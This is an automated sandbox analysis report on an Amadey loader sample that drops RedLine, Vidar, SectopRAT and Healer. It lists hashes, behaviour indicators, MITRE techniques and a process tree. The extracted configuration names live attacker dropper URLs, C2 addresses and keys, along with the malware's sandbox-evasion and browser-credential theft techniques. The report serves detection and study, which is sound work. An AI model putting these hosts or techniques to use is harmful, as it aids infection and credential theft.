amadey | 0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483

Resubmissions

21-02-2025 13:19

250221-qkqm1sskh1 10

21-02-2025 12:51

250221-p3vt1ssmek 10

20-02-2025 14:07

250220-rey8mswqdj 10

Analysis

max time kernel
94s
max time network
191s
platform
windows11-21h2_x64
resource
win11-20250217-en
resource tags

arch:x64arch:x86image:win11-20250217-enlocale:en-usos:windows11-21h2-x64system
submitted
21-02-2025 13:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Size

2.1MB
MD5

f22b0344fefdf201d07314323a83b022
SHA1

6dde721e943cb298e50446083c1d7260071aaaae
SHA256

0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483
SHA512

61f92704af7395159edb879fe394a64e30b0b0818d642be1eeecafeee54e22570add0e4eac88c83e00cd9a4642e09a8529c77a69b4b7613bc3bcb9f78f50feac
SSDEEP

49152:vDB/YpemdpJhhEwrtke2DSl/YKH7vOITWMPnzZPoc9j:9/kXhEikRDS/bvOIbPnzZxj

Score

10^/10

amadey healer redline sectoprat vidar 9c9aa5 cheat credential_access defense_evasion discovery dropper execution infostealer rat spyware stealer trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

redline

Botnet

cheat

103.84.89.222:33791

Extracted

Family

vidar

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detect Vidar Stealer 3 IoCs

stealer

resource	yara_rule
behavioral1/memory/5668-851-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/5508-846-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7
behavioral1/memory/5508-842-0x0000000000400000-0x0000000000422000-memory.dmp	family_vidar_v7

Detects Healer an antivirus disabler dropper 3 IoCs

resource	yara_rule
behavioral1/memory/4452-1508-0x00000000007E0000-0x0000000000C2C000-memory.dmp	healer
behavioral1/memory/4452-1509-0x00000000007E0000-0x0000000000C2C000-memory.dmp	healer
behavioral1/memory/4452-1643-0x00000000007E0000-0x0000000000C2C000-memory.dmp	healer

Healer
Healer an antivirus disabler dropper.
dropper healer
Healer family
healer
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline
Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 4 IoCs

resource	yara_rule
behavioral1/memory/4680-208-0x0000000000EB0000-0x0000000001328000-memory.dmp	family_sectoprat
behavioral1/memory/4680-209-0x0000000000EB0000-0x0000000001328000-memory.dmp	family_sectoprat
behavioral1/memory/6504-2008-0x00000000009A0000-0x0000000000E18000-memory.dmp	family_sectoprat
behavioral1/memory/6504-2009-0x00000000009A0000-0x0000000000E18000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ViGgA8C.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d2YQIJa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	sHN20me.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	spoDnGT.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe

Blocklisted process makes network request 46 IoCs

flow	pid	Process
22	2448	powershell.exe
23	2448	powershell.exe
26	2448	powershell.exe
27	2448	powershell.exe
29	2448	powershell.exe
32	2448	powershell.exe
41	2448	powershell.exe
49	2448	powershell.exe
60	2448	powershell.exe
68	2448	powershell.exe
72	2448	powershell.exe
75	2448	powershell.exe
80	2448	powershell.exe
83	2448	powershell.exe
84	2448	powershell.exe
85	2448	powershell.exe
86	2448	powershell.exe
87	2448	powershell.exe
88	2448	powershell.exe
89	2448	powershell.exe
90	2448	powershell.exe
91	2448	powershell.exe
92	2448	powershell.exe
93	2448	powershell.exe
94	2448	powershell.exe
95	2448	powershell.exe
96	2448	powershell.exe
97	2448	powershell.exe
98	2448	powershell.exe
99	2448	powershell.exe
102	2448	powershell.exe
103	2448	powershell.exe
104	2448	powershell.exe
107	2448	powershell.exe
108	2448	powershell.exe
109	2448	powershell.exe
110	2448	powershell.exe
117	2448	powershell.exe
122	2448	powershell.exe
126	2448	powershell.exe
127	2448	powershell.exe
128	2448	powershell.exe
129	2448	powershell.exe
131	2448	powershell.exe
132	2448	powershell.exe
133	2448	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3960	powershell.exe
4172	powershell.exe
1800	powershell.exe
656	powershell.exe
4416	powershell.exe
5696	powershell.exe
1980	powershell.exe
1044	powershell.exe

Downloads MZ/PE file 23 IoCs

flow	pid	Process
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe
5	2064	skotes.exe

Uses browser remote debugging 2 TTPs 28 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
1392	chrome.exe
6956	chrome.exe
6272	chrome.exe
7120	chrome.exe
4776	msedge.exe
6808	msedge.exe
4652	msedge.exe
5544	chrome.exe
3228	chrome.exe
2172	msedge.exe
2416	msedge.exe
3760	msedge.exe
5772	msedge.exe
1364	msedge.exe
5756	msedge.exe
6084	chrome.exe
4556	chrome.exe
3708	chrome.exe
3912	msedge.exe
5736	msedge.exe
4216	msedge.exe
1596	chrome.exe
244	chrome.exe
6120	chrome.exe
2660	chrome.exe
6704	chrome.exe
5732	chrome.exe
4048	chrome.exe

Checks BIOS information in registry 2 TTPs 16 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	sHN20me.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ViGgA8C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d2YQIJa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	spoDnGT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ViGgA8C.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d2YQIJa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	sHN20me.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	spoDnGT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe

Drops startup file 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat	powershell.exe

Executes dropped EXE 22 IoCs

pid	Process
2064	skotes.exe
4964	skotes.exe
3912	b64397a805.exe
2248	b64397a805.exe
3092	b64397a805.exe
4412	13Z5sqy.exe
2820	jonbDes.exe
1516	Bjkm5hE.exe
2588	Bjkm5hE.exe
4764	Bjkm5hE.exe
4680	ViGgA8C.exe
4780	DTQCxXZ.exe
4784	TaVOM7x.exe
1512	d2YQIJa.exe
5496	skotes.exe
5724	sHN20me.exe
6028	spoDnGT.exe
5316	7aencsM.exe
5524	7aencsM.exe
5504	7aencsM.exe
5508	7aencsM.exe
5668	7aencsM.exe

Identifies Wine through registry keys 2 TTPs 8 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Wine	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Wine	ViGgA8C.exe
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Wine	d2YQIJa.exe
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Wine	sHN20me.exe
Key opened	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000\Software\Wine	spoDnGT.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
40	raw.githubusercontent.com
217	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
58	ipinfo.io

AutoIT Executable 3 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x001a00000002af79-1457.dat	autoit_exe
behavioral1/files/0x001a00000002b127-2179.dat	autoit_exe
behavioral1/files/0x001d00000002b0c3-2219.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs

pid	Process
3776	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
2064	skotes.exe
4964	skotes.exe
4680	ViGgA8C.exe
1512	d2YQIJa.exe
5496	skotes.exe
5724	sHN20me.exe
6028	spoDnGT.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 3912 set thread context of 2248	3912	b64397a805.exe	88
PID 3912 set thread context of 3092	3912	b64397a805.exe	89
PID 1516 set thread context of 2588	1516	Bjkm5hE.exe	97
PID 1516 set thread context of 4764	1516	Bjkm5hE.exe	98
PID 5316 set thread context of 5508	5316	7aencsM.exe	141
PID 5316 set thread context of 5668	5316	7aencsM.exe	142

UPX packed file 3 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001c00000002af6a-941.dat	upx
behavioral1/memory/6088-957-0x0000000000AC0000-0x0000000001D82000-memory.dmp	upx
behavioral1/memory/6088-1135-0x0000000000AC0000-0x0000000001D82000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File created	C:\Windows\Tasks\skotes.job	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 4 IoCs

pid	pid_target	Process	procid_target
3608	3912	WerFault.exe	86
888	1516	WerFault.exe	96
5644	5316	WerFault.exe	138
988	2996	WerFault.exe	289

System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b64397a805.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b64397a805.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	13Z5sqy.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b64397a805.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoDnGT.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	jonbDes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ViGgA8C.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TaVOM7x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d2YQIJa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sHN20me.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7aencsM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Bjkm5hE.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DTQCxXZ.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
5688	timeout.exe
5876	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	156	Go-http-client/1.1

Kills process with taskkill 5 IoCs

defense_evasion

pid	Process
4176	taskkill.exe
7024	taskkill.exe
5668	taskkill.exe
2912	taskkill.exe
6268	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133846172401457383"	chrome.exe

Modifies registry class 4 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	BackgroundTransferHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:"	BackgroundTransferHost.exe
Key created	\REGISTRY\USER\S-1-5-21-2250935964-4080446702-2776729278-1000_Classes\Local Settings\MuiCache	BackgroundTransferHost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2716	schtasks.exe
3008	schtasks.exe
5024	schtasks.exe

Suspicious behavior: EnumeratesProcesses 46 IoCs

pid	Process
3776	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
3776	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
2064	skotes.exe
2064	skotes.exe
4964	skotes.exe
4964	skotes.exe
3092	b64397a805.exe
3092	b64397a805.exe
2248	b64397a805.exe
2248	b64397a805.exe
3092	b64397a805.exe
2248	b64397a805.exe
3092	b64397a805.exe
2248	b64397a805.exe
656	powershell.exe
656	powershell.exe
2448	powershell.exe
2448	powershell.exe
4680	ViGgA8C.exe
4680	ViGgA8C.exe
4416	powershell.exe
4416	powershell.exe
4680	ViGgA8C.exe
4680	ViGgA8C.exe
1524	chrome.exe
1524	chrome.exe
1512	d2YQIJa.exe
1512	d2YQIJa.exe
5496	skotes.exe
5496	skotes.exe
1512	d2YQIJa.exe
1512	d2YQIJa.exe
1512	d2YQIJa.exe
1512	d2YQIJa.exe
5724	sHN20me.exe
5724	sHN20me.exe
4780	DTQCxXZ.exe
4780	DTQCxXZ.exe
4780	DTQCxXZ.exe
4780	DTQCxXZ.exe
6028	spoDnGT.exe
6028	spoDnGT.exe
6028	spoDnGT.exe
6028	spoDnGT.exe
6028	spoDnGT.exe
6028	spoDnGT.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe

Suspicious use of AdjustPrivilegeToken 36 IoCs

description	pid	Process
Token: SeDebugPrivilege	656	powershell.exe
Token: SeDebugPrivilege	2448	powershell.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeDebugPrivilege	4680	ViGgA8C.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe
Token: SeShutdownPrivilege	1524	chrome.exe
Token: SeCreatePagefilePrivilege	1524	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe
1524	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3776 wrote to memory of 2064	3776	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	83
PID 3776 wrote to memory of 2064	3776	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	83
PID 3776 wrote to memory of 2064	3776	0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe	83
PID 2064 wrote to memory of 3912	2064	skotes.exe	86
PID 2064 wrote to memory of 3912	2064	skotes.exe	86
PID 2064 wrote to memory of 3912	2064	skotes.exe	86
PID 3912 wrote to memory of 2248	3912	b64397a805.exe	88
PID 3912 wrote to memory of 2248	3912	b64397a805.exe	88
PID 3912 wrote to memory of 2248	3912	b64397a805.exe	88
PID 3912 wrote to memory of 2248	3912	b64397a805.exe	88
PID 3912 wrote to memory of 2248	3912	b64397a805.exe	88
PID 3912 wrote to memory of 2248	3912	b64397a805.exe	88
PID 3912 wrote to memory of 2248	3912	b64397a805.exe	88
PID 3912 wrote to memory of 2248	3912	b64397a805.exe	88
PID 3912 wrote to memory of 2248	3912	b64397a805.exe	88
PID 3912 wrote to memory of 3092	3912	b64397a805.exe	89
PID 3912 wrote to memory of 3092	3912	b64397a805.exe	89
PID 3912 wrote to memory of 3092	3912	b64397a805.exe	89
PID 3912 wrote to memory of 3092	3912	b64397a805.exe	89
PID 3912 wrote to memory of 3092	3912	b64397a805.exe	89
PID 3912 wrote to memory of 3092	3912	b64397a805.exe	89
PID 3912 wrote to memory of 3092	3912	b64397a805.exe	89
PID 3912 wrote to memory of 3092	3912	b64397a805.exe	89
PID 3912 wrote to memory of 3092	3912	b64397a805.exe	89
PID 2064 wrote to memory of 4412	2064	skotes.exe	94
PID 2064 wrote to memory of 4412	2064	skotes.exe	94
PID 2064 wrote to memory of 4412	2064	skotes.exe	94
PID 2064 wrote to memory of 2820	2064	skotes.exe	95
PID 2064 wrote to memory of 2820	2064	skotes.exe	95
PID 2064 wrote to memory of 2820	2064	skotes.exe	95
PID 2064 wrote to memory of 1516	2064	skotes.exe	96
PID 2064 wrote to memory of 1516	2064	skotes.exe	96
PID 2064 wrote to memory of 1516	2064	skotes.exe	96
PID 1516 wrote to memory of 2588	1516	Bjkm5hE.exe	97
PID 1516 wrote to memory of 2588	1516	Bjkm5hE.exe	97
PID 1516 wrote to memory of 2588	1516	Bjkm5hE.exe	97
PID 1516 wrote to memory of 2588	1516	Bjkm5hE.exe	97
PID 1516 wrote to memory of 2588	1516	Bjkm5hE.exe	97
PID 1516 wrote to memory of 2588	1516	Bjkm5hE.exe	97
PID 1516 wrote to memory of 2588	1516	Bjkm5hE.exe	97
PID 1516 wrote to memory of 2588	1516	Bjkm5hE.exe	97
PID 1516 wrote to memory of 2588	1516	Bjkm5hE.exe	97
PID 1516 wrote to memory of 4764	1516	Bjkm5hE.exe	98
PID 1516 wrote to memory of 4764	1516	Bjkm5hE.exe	98
PID 1516 wrote to memory of 4764	1516	Bjkm5hE.exe	98
PID 1516 wrote to memory of 4764	1516	Bjkm5hE.exe	98
PID 1516 wrote to memory of 4764	1516	Bjkm5hE.exe	98
PID 1516 wrote to memory of 4764	1516	Bjkm5hE.exe	98
PID 1516 wrote to memory of 4764	1516	Bjkm5hE.exe	98
PID 1516 wrote to memory of 4764	1516	Bjkm5hE.exe	98
PID 1516 wrote to memory of 4764	1516	Bjkm5hE.exe	98
PID 2064 wrote to memory of 656	2064	skotes.exe	101
PID 2064 wrote to memory of 656	2064	skotes.exe	101
PID 2064 wrote to memory of 656	2064	skotes.exe	101
PID 656 wrote to memory of 5032	656	powershell.exe	103
PID 656 wrote to memory of 5032	656	powershell.exe	103
PID 656 wrote to memory of 5032	656	powershell.exe	103
PID 5032 wrote to memory of 3544	5032	cmd.exe	105
PID 5032 wrote to memory of 3544	5032	cmd.exe	105
PID 5032 wrote to memory of 3544	5032	cmd.exe	105
PID 5032 wrote to memory of 2448	5032	cmd.exe	106
PID 5032 wrote to memory of 2448	5032	cmd.exe	106
PID 5032 wrote to memory of 2448	5032	cmd.exe	106
PID 2064 wrote to memory of 4680	2064	skotes.exe	107

C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe
"C:\Users\Admin\AppData\Local\Temp\0c7c79b06ebdce1cfdd30af9c1ea2afb962426dfe27cfe036f21e7818549c483.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3776
- C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
  "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:2064
- - C:\Users\Admin\AppData\Local\Temp\1014060001\b64397a805.exe
    "C:\Users\Admin\AppData\Local\Temp\1014060001\b64397a805.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
